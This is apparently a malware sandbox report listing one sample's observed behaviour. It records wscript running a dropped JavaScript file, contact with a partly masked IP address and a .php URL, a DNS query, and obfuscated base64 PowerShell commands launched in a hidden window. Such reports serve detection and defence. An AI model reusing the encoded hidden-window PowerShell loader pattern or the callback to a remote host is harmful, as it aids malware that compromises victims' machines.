Technical Information
- '<SYSTEM32>\wscript.exe' "%WINDIR%\Temp\sbzNavsVwxX.js"
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1932
- %WINDIR%\temp\sbznavsvwxx.js
- %TEMP%\1223266.cvr
- '5.###.62.229':80
- '5.###.62.229':443
- http://5.###.62.229/73891918.php
- '5.###.62.229':443
- DNS ASK h5#####xaaz56k11.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBt...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBt...